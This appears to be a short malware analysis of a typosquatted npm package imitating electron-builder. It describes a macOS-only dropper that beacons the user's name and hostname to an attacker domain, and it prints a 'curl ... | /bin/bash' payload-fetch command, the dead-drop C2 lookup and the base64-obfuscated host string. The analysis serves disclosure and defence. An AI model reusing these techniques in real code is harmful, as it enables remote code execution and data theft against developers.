On require(), index.js executes an immediately-invoked function that platform-gates to macOS, skips CI environments, drops a one-shot marker file in ~/.cache/.nyx-npm/eb, then after a 30-90 second random delay performs two attacker-controlled network operations. First, it issues a curl GET to https://k7xm9q.xyz/api/clickfix-callback carrying a beacon ID, $USER, os.hostname(), and the literal tag 'npm_electron-buidler' as query parameters, identifying the victim to the attacker. Second, it fetches a dead-drop file at https://raw.githubusercontent.com/nyx-deploy/config/main/c2.txt to learn a C2 base (base64-encoded fallback decodes to https://k7xm9q.xyz), then pipes curl -sSfL <C2>/api/payload/ | /bin/bash via spawn('/bin/sh','-c',...) with & disown to detach the shell. The C2 host is concealed via atob('aHR0cHM6Ly9rN3htOXEueHl6'). The package name '@403name/electron-buidler' is a one-character typo of the popular 'electron-builder' package under an unrelated scope; the README's 'Electron application builder' claim is a cover for the dropper. Importing this package on a non-CI macOS host yields full remote code execution as the installing user with attacker-controlled payload delivery and no consent.